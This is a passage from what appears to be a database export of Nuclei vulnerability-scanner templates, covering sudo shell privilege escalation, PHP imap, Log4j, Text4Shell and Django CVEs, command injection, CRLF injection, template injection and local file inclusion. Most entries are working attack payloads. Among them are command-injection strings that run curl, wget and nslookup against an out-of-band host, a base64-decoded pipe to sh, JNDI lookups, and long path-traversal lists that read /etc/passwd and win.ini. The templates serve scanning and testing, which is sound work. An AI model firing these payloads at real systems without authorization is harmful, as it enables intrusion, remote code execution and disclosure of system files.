- sh\n - bash\n source: |\n sudo yash -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 
490a004630440220407cbe43d57f1fdae8cb42d677464a71d661e4ad5e5f625a3c8046b40e9a7c2e0220090af158add8ff1477e2996116208ad71e0c659f5975505ecc9c7a4fee7d91fe:922c64590222798bb761d5b6d8e72950", "hash": "990013e6e7c960928e884ea4a70947b1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7b" }, "name": "privesc-zsh.yaml", "content": "id: privesc-zsh\n\ninfo:\n name: Zsh - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n zsh is a powerful and feature-rich shell for Unix-like operating systems. It offers advanced interactive features, extensive customization options, and robust scripting capabilities\n reference:\n - https://gtfobins.github.io/gtfobins/zsh/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,zsh,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n zsh -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo zsh -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100a27777a032bc8fb0a3e2a867285d0cd42cd9f86a049322603e8f04b572b5a4590221008ea1c8c84f81b54c9bba8885838fd47102d59fc32bf2018094b21e85e2b28e7b:922c64590222798bb761d5b6d8e72950", "hash": "04275c26c3aaa0515fa31176ab479625", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7c" }, "name": "CVE-2018-19518.yaml", "content": "id: CVE-2018-19518\n\ninfo:\n name: PHP imap - Remote Command Execution\n author: princechaddha\n severity: high\n description: |\n University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) 
without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a \"-oProxyCommand\" argument.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19518\n - https://www.openwall.com/lists/oss-security/2018/11/22/3\n - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.5\n cve-id: CVE-2018-19518\n cwe-id: CWE-88\n metadata:\n confidence: tentative\n tags: imap,dast,vulhub,cve,cve2018,rce,oast,php\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n php-imap:\n - \"x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}\"\n\n fuzzing:\n - part: query\n fuzz:\n - \"{{php-imap}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4a0a00473045022100af7a090c8826b8f7eb0934a5a130dc05780441afce33b5e31dda44213d47691e02205499f8bad4923cabbddd841491363890751a97b823905e848b6ed457c4d2ecab:922c64590222798bb761d5b6d8e72950", "hash": "f57665e6a73beb5ee5ddba399602650e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7d" }, "name": "CVE-2021-45046.yaml", "content": "id: CVE-2021-45046-DAST\n\ninfo:\n name: Apache Log4j2 - Remote Code Injection\n author: princechaddha\n severity: critical\n description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default 
configurations.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/\n - https://twitter.com/marcioalm/status/1471740771581652995\n - https://logging.apache.org/log4j/2.x/\n - http://www.openwall.com/lists/oss-security/2021/12/14/4\n - https://nvd.nist.gov/vuln/detail/CVE-2021-44228\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9\n cve-id: CVE-2021-45046\n cwe-id: CWE-502\n metadata:\n confidence: tentative\n tags: cve,cve2021,rce,oast,log4j,injection,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n log4j:\n - \"${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}\"\n\n fuzzing:\n - part: query\n fuzz:\n - \"{{log4j}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: regex\n part: interactsh_request\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print extracted ${hostName} in output\n\n extractors:\n - type: regex\n part: interactsh_request\n group: 2\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print injection point in output\n\n - type: regex\n part: interactsh_request\n group: 1\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print extracted ${hostName} in output\n# digest: 4a0a00473045022036888452035d1bfa69cbc32805393a712fdcd5595224466cc327e681ba5ef5770221008096d4d19c6975ad5bd44b06d4bc1cdfd0746570cb65c17c50cf4eb2e8a7b10d:922c64590222798bb761d5b6d8e72950", "hash": "eb83c67b3d241275027574061148c8d0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7e" }, "name": "CVE-2022-34265.yaml", "content": "id: CVE-2022-34265\n\ninfo:\n name: Django - SQL injection\n author: princechaddha\n severity: critical\n description: |\n An issue was discovered in Django 3.2 before 3.2.14 and 
4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34265\n - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/\n - https://docs.djangoproject.com/en/4.0/releases/security/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-34265\n cwe-id: CWE-89\n tags: sqli,dast,vulhub,cve,cve2022,django\n\nvariables:\n rand_string: '{{rand_text_alpha(15, \"abc\")}}'\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n fuzzing:\n - part: query\n fuzz:\n - \"test'{{rand_string}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'syntax error at or near \"{{rand_string}}\"'\n - 'LINE 1: SELECT DATE_TRUNC'\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022100991d4f9cc916935beb1ad69688feda3753f72a2ab38d08917c1e133380434c010220783ace6ba00da5d1932b3362ce58cec8541b97e0058c709b6c99ff14f9cdaba8:922c64590222798bb761d5b6d8e72950", "hash": "1c97bf516a1feae926c7d92e6e915d1d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7f" }, "name": "CVE-2022-42889.yaml", "content": "id: CVE-2022-42889\n\ninfo:\n name: Text4Shell - Remote Code Execution\n author: mordavid,princechaddha\n severity: critical\n description: |\n Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. 
Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.\n reference:\n - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om\n - http://www.openwall.com/lists/oss-security/2022/10/13/4\n - http://www.openwall.com/lists/oss-security/2022/10/18/1\n - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/\n - https://github.com/silentsignal/burp-text4shell\n remediation: Upgrade Apache Commons Text to version 1.10.0, which disables the problematic interpolators by default; versions 1.5.0 through 1.9 are affected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-42889\n cwe-id: CWE-94\n metadata:\n confidence: tentative\n tags: cve,cve2022,rce,oast,text4shell,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n text4shell:\n - \"${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}\"\n\n fuzzing:\n - part: query\n fuzz:\n - \"{{text4shell}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: regex\n part: interactsh_request\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print extracted ${hostName} in output\n\n extractors:\n - type: kval\n kval:\n - interactsh_ip # Print remote interaction IP in output\n\n - type: regex\n 
part: interactsh_request\n group: 2\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print injection point in output\n\n - type: regex\n part: interactsh_request\n group: 1\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print extracted ${hostName} in output\n# digest: 4a0a00473045022100adec8de25b518a2bc2dec461a62f19c384ddac2951bd98b9ec21df05061c84d9022013f544b276c203c4846921eddf8c0be1a997fd68f5d3c8b8ff71f02873788aed:922c64590222798bb761d5b6d8e72950", "hash": "dd8f3db1b13736a5f81f98279c1a1da1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c80" }, "name": "blind-oast-polyglots.yaml", "content": "id: cmdi-blind-oast-polyglot\n\ninfo:\n name: Blind OS Command Injection\n author: pdteam,geeknik\n severity: high\n description: |\n Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input.\n Successful exploitation could lead to arbitrary command execution on the system.\n reference:\n - https://portswigger.net/research/hunting-asynchronous-vulnerabilities\n - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md\n tags: cmdi,oast,dast,blind,polyglot\n\nvariables:\n marker: \"{{interactsh-url}}\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n payload:\n - \"&nslookup {{marker}}&'\\\\\\\"`0&nslookup {{marker}}&`'\"\n - \"1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\\\";nslookup${IFS}{{marker}};#${IFS}\"\n - \"/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\\\"||nslookup({{marker}})||\\\"/*`*/\"\n - \"$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)\"\n\n fuzzing:\n - part: query\n type: postfix\n fuzz:\n - \"{{payload}}\"\n\n stop-at-first-match: true\n 
matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n# digest: 490a00463044022058dacdd25a0687edf873bcfed32eb383e77deb0e9ea9673e111501121429df2702202005d54354bf6a06cd873145dea3139f0b094a3baad9e7313fd9d65ef7b31876:922c64590222798bb761d5b6d8e72950", "hash": "3a3605c633a724ad016d9380d3a854d4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c81" }, "name": "ruby-open-rce.yaml", "content": "id: cmdi-ruby-open-rce\n\ninfo:\n name: Ruby Kernel#open/URI.open RCE\n author: pdteam\n severity: high\n description: |\n Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.\n reference:\n - https://bishopfox.com/blog/ruby-vulnerabilities-exploits\n - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/\n tags: cmdi,oast,dast,blind,ruby,rce\n\nvariables:\n marker: \"{{interactsh-url}}\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n stop-at-first-match: true\n payloads:\n interaction:\n - \"|nslookup {{marker}}|curl {{marker}}\"\n\n fuzzing:\n - part: query\n fuzz:\n - \"{{interaction}}\"\n\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n# digest: 490a0046304402206aa8aaaae832c775eb192a6fa98138271fa21bc2ac34b3881f0e06d24fb48f78022040513ba5b73cbfb5fe42c3a312ae9d8e76fb0d6f942ad7bcfe8dfff4f173d00c:922c64590222798bb761d5b6d8e72950", "hash": "fa13fa98bae4cf75af71c4eb712968f4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c82" }, "name": "cookie-injection.yaml", "content": "id: cookie-injection\n\ninfo:\n name: Parameter based cookie injection\n author: pdteam\n severity: info\n reference:\n - 
https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/\n - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm\n tags: reflected,dast,cookie,injection\n\nvariables:\n first: \"cookie_injection\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n reflection:\n - \"{{first}}\"\n\n fuzzing:\n - part: query\n type: postfix\n fuzz:\n - \"{{reflection}}\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)(?i)(^set-cookie.*cookie_injection.*)'\n# digest: 4a0a00473045022100af6e35a8b4c4d4533e339e81393faed157da2e68144557ca3fe73fb16178919c022073127c1b729ab0c8c273cbc022b2aca2b7a91a6c4c314633a20059e6b10e22ed:922c64590222798bb761d5b6d8e72950", "hash": "6c78d16674d57506fe68ec69607267f0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c83" }, "name": "crlf-injection.yaml", "content": "id: crlf-injection\n\ninfo:\n name: CRLF Injection\n author: pdteam\n severity: low\n tags: crlf,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n escape:\n - \"%00\"\n - \"%0a\"\n - \"%0a%20\"\n - \"%0d\"\n - \"%0d%09\"\n - \"%0d%0a\"\n - \"%0d%0a%09\"\n - \"%0d%0a%20\"\n - \"%0d%20\"\n - \"%20\"\n - \"%20%0a\"\n - \"%20%0d\"\n - \"%20%0d%0a\"\n - \"%23%0a\"\n - \"%23%0a%20\"\n - \"%23%0d\"\n - \"%23%0d%0a\"\n - \"%23%oa\"\n - \"%25%30\"\n - \"%25%30%61\"\n - \"%2e%2e%2f%0d%0a\"\n - \"%2f%2e%2e%0d%0a\"\n - \"%2f..%0d%0a\"\n - \"%3f\"\n - \"%3f%0a\"\n - \"%3f%0d\"\n - \"%3f%0d%0a\"\n - \"%e5%98%8a%e5%98%8d\"\n - \"%e5%98%8a%e5%98%8d%0a\"\n - \"%e5%98%8a%e5%98%8d%0d\"\n - \"%e5%98%8a%e5%98%8d%0d%0a\"\n - \"%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d\"\n - \"%u0000\"\n - \"%u000a\"\n - \"%u000d\"\n - \"\\r\"\n - \"\\r%20\"\n - \"\\r\\n\"\n - \"\\r\\n%20\"\n - \"\\r\\n\\t\"\n - \"\\r\\t\"\n\n fuzzing:\n - part: query\n type: postfix\n fuzz:\n - \"{{escape}}Set-Cookie:crlfinjection=crlfinjection\"\n\n 
stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)'\n# digest: 4b0a00483046022100cb88bef820fa9247bc7ddc126d8bb67c4d2371c0b4a33f64b4caa5360007f1750221009ea9e7de7dc5fe7e75cf9d215a9c2d9e3323f2caa40b7c4b39cf214f661cce48:922c64590222798bb761d5b6d8e72950", "hash": "3f73b53267914574a8a5fb04555408f6", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c84" }, "name": "angular-client-side-template-injection.yaml", "content": "id: angular-client-side-template-injection\n\ninfo:\n name: Angular Client-side-template-injection\n author: theamanrawat\n severity: high\n description: |\n Detects Angular client-side template injection vulnerability.\n impact: |\n May lead to remote code execution or sensitive data exposure.\n remediation: |\n Sanitize user inputs and avoid using user-controlled data in template rendering.\n reference:\n - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/\n - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs\n tags: angular,csti,dast,headless,xss\n\nvariables:\n first: \"{{rand_int(1000, 9999)}}\"\n second: \"{{rand_int(1000, 9999)}}\"\n result: \"{{to_number(first)*to_number(second)}}\"\n\nheadless:\n - steps:\n - action: navigate\n args:\n url: \"{{BaseURL}}\"\n\n - action: waitload\n\n payloads:\n payload:\n - '{{concat(\"{{\", \"{{first}}*{{second}}\", \"}}\")}}'\n\n fuzzing:\n - part: query\n type: postfix\n mode: single\n fuzz:\n - \"{{payload}}\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"{{result}}\"\n# digest: 4a0a00473045022100adfe788d650a997bddf7f4876f1308a9d1ea62d43e7b90abca139f455492d4e902203223d59aac1aa4374770127adface5ccebfd4a4dc8fdfef8b240578bf7b6df72:922c64590222798bb761d5b6d8e72950", "hash": "0a9215588b189abfdbe8bbb570f810c9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf307c85" }, "name": "lfi-keyed.yaml", "content": "id: lfi-keyed\n\ninfo:\n name: LFI Detection - Keyed\n author: pwnhxl\n severity: unknown\n reference:\n - https://owasp.org/www-community/attacks/Unicode_Encoding\n tags: dast,pathtraversal,lfi\n\nvariables:\n fuzz: \"../../../../../../../../../../../../../../../\"\n fuzz_urlx2_encode: \"%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f\"\n fuzz_hex_unicode: \"%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f\"\n fuzz_utf8_unicode: \"%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF\"\n fuzz_utf8_unicode_x: \"%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF\"\n fuzz_bypass_replace: \".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../\"\n fuzz_bypass_replace_windows: '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\'\n fuzz_bypass_waf_regx: \"./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n pathtraversal:\n - '{{fuzz}}etc/passwd'\n - '{{fuzz}}windows/win.ini'\n - '/etc/passwd%00.jpg'\n - 'c:/windows/win.ini%00.jpg'\n - '{{fuzz}}etc/passwd%00.jpg'\n - 
'{{fuzz}}windows/win.ini%00.jpg'\n - '{{fuzz_urlx2_encode}}etc%252fpasswd'\n - '{{fuzz_urlx2_encode}}windows%252fwin.ini'\n - '{{fuzz_hex_unicode}}etc%u002fpasswd'\n - '{{fuzz_hex_unicode}}windows%u002fwin.ini'\n - '{{fuzz_utf8_unicode}}etc%C0%AFpasswd'\n - '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini'\n - '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd'\n - '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini'\n - '{{fuzz_bypass_replace}}etc/passwd'\n - '{{fuzz_bypass_replace}}windows/win.ini'\n - '{{fuzz_bypass_replace_windows}}windows\\win.ini'\n - '{{fuzz_bypass_waf_regx}}etc/passwd'\n - '{{fuzz_bypass_waf_regx}}windows/win.ini'\n - './web.config'\n - '../web.config'\n - '../../web.config'\n - './WEB-INF/web.xml'\n - '../WEB-INF/web.xml'\n - '../../WEB-INF/web.xml'\n\n fuzzing:\n - part: query\n mode: single\n keys:\n - cat\n - dir\n - action\n - board\n - date\n - detail\n - file\n - download\n - path\n - folder\n - prefix\n - include\n - page\n - inc\n - locate\n - show\n - doc\n - site\n - type\n - view\n - content\n - document\n - layout\n - mod\n - conf\n - url\n - img\n - image\n - images\n fuzz:\n - \"{{pathtraversal}}\"\n\n - part: query\n mode: single\n values:\n - \"^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$\"\n fuzz:\n - \"{{pathtraversal}}\"\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n - type: regex\n part: body\n regex:\n - 'root:.*?:[0-9]*:[0-9]*:'\n\n - type: word\n part: body\n words:\n - 'for 16-bit app support'\n\n - type: regex\n part: body\n regex:\n - '()'\n\n - type: regex\n part: body\n regex:\n - '()'\n# digest: 4b0a004830460221008cfcfdf2c3bffd887bfe964b433efe76af72df0f94ecea20ec1917cd00641c0f022100874e6ff747dbd4fa96124d034a126534558b56a7c317b32525e3d08199409065:922c64590222798bb761d5b6d8e72950", "hash": "1af68417309804739b38b836d2075162", "level": 1, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c86" }, "name": "linux-lfi-fuzz.yaml", "content": "id: 
linux-lfi-fuzz\n\ninfo:\n name: Local File Inclusion - Linux\n author: DhiyaneshDK\n severity: high\n reference:\n - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt\n - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion\n tags: lfi,dast,linux\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n nix_fuzz:\n - '/etc/passwd'\n - '../../etc/passwd'\n - '../../../etc/passwd'\n - '/../../../../etc/passwd'\n - '../../../../../../../../../etc/passwd'\n - '../../../../../../../../etc/passwd'\n - '../../../../../../../etc/passwd'\n - '../../../../../../etc/passwd'\n - '../../../../../etc/passwd'\n - '../../../../etc/passwd'\n - '../../../etc/passwd'\n - '../../../etc/passwd%00'\n - '../../../../../../../../../../../../etc/passwd%00'\n - '../../../../../../../../../../../../etc/passwd'\n - '/../../../../../../../../../../etc/passwd^^'\n - '/../../../../../../../../../../etc/passwd'\n - '/./././././././././././etc/passwd'\n - '\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd'\n - '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd'\n - '/..\\../..\\../..\\../..\\../..\\../..\\../etc/passwd'\n - '.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd'\n - '\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00'\n - '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00'\n - '%252e%252e%252fetc%252fpasswd'\n - '%252e%252e%252fetc%252fpasswd%00'\n - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'\n - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'\n - '....//....//etc/passwd'\n - '..///////..////..//////etc/passwd'\n - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'\n - '%0a/bin/cat%20/etc/passwd'\n - '%00/etc/passwd%00'\n - '%00../../../../../../etc/passwd'\n - '/../../../../../../../../../../../etc/passwd%00.jpg'\n - '/../../../../../../../../../../../etc/passwd%00.html'\n - 
'/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'\n - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n - '\\\\'/bin/cat%20/etc/passwd\\\\''\n - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'\n - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'\n - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'\n - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'\n\n fuzzing:\n - part: query\n type: replace # replaces existing parameter value with fuzz payload\n mode: multiple # replaces all parameters value with fuzz payload\n fuzz:\n - '{{nix_fuzz}}'\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: body\n regex:\n - 'root:.*:0:0:'\n# digest: 4b0a00483046022100a1e70a22bc4f17a046a9b366a9015608da82f88439ab75d052b64088a7009da8022100e29c115d86b47951f1da2fb56d7953ec1e59e93d86b70d24d34ad8c14ad3064d:922c64590222798bb761d5b6d8e72950", "hash": "42bba0ab180a51442dfb6ecee1173908", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c87" }, "name": "windows-lfi-fuzz.yaml", "content": "id: windows-lfi-fuzz\n\ninfo:\n name: Local File Inclusion - Windows\n author: pussycat0x\n severity: high\n tags: lfi,windows,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n win_fuzz:\n - '\\WINDOWS\\win.ini'\n - '\\WINDOWS\\win.ini'\n - '\\WINDOWS\\win.ini%00'\n - '\\WINNT\\win.ini'\n - '\\WINNT\\win.ini%00'\n - 'windows/win.ini%00'\n - '../../windows/win.ini'\n - '....//....//windows/win.ini'\n - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'\n - '../../../../../windows/win.ini'\n - 
